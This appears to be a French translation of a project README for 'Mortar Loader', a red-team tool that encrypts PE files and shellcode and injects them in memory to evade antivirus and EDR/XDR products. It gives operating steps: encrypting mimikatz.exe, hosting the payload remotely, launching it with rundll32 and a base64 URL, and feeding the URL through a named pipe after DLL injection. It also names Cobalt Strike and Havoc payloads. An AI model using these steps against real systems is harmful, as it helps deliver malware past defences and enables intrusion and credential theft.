
technique d'évasion pour contrer et détourner la détection et la prévention des produits de sécurité (AV/EDR/XDR)
Technique d'évasion pour red team afin de vaincre et détourner la détection et la prévention des produits de sécurité. Mortar Loader effectue le chiffrement et le déchiffrement de PE/Shellcode dans les flux mémoire et les exécute en exploitant plusieurs techniques d'injection.
Mortar est capable de contourner les produits antivirus modernes et les solutions XDR avancées, et a été testé et confirmé pour contourner les produits suivants :
La nouvelle version (v3) a été publiée avec les fonctionnalités suivantes :
Pour une description technique plus détaillée, référez-vous au billet de blog suivant : https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html
L'encrypteur chiffre les shellcodes C et les binaires PE et écrit la sortie dans un fichier .enc. Vous êtes autorisé à utiliser n'importe quelle charge utile (MSF/Cobalt/Havoc, etc.) comme vous le souhaitez, à condition qu'elle soit de l'architecture x64 et non RAW.
root@kali>./encryptor -f mimikatz.exe -o bin.enc
root@kali>./encryptor -f shellcode.c -o bin.enc
La nouvelle version exploite plusieurs techniques combinées avec la récupération de charge utile à distance, il est recommandé de se référer au billet de blog suivant pour plus d'informations.
pour des instructions rapides
# PE Forking
1. host your encrypted binary on remote host.
2. encode the final URL with base64.
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. covert reload subroutine technique is enabled.
Prend actuellement en charge l'injection Early Bird en combinaison avec des pipes nommés pour recevoir les variables pour l'exécution finale.
1. inject Mortar DLL into remote process( DLL injection, Hijacking, sideloading).
2. connect into the named pipe to supply your URL
echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs
3. payload will be executed once valid value has been recieved.
Le projet a été codé en utilisant FPC (Free Pascal), les procédures de compilation sont simples en téléchargeant et installant Lazarus IDE (https://www.lazarus-ide.org/index.php?page=downloads).
Pour l'encrypteur, vous pouvez le télécharger depuis la section des versions ou le compiler facilement avec Lazarus IDE.
#Debian & Ubuntu
apt install fpc
apt install lazarus-ide
Le développement de Mortar ou de tout projet partagé est le résultat de mon temps personnel.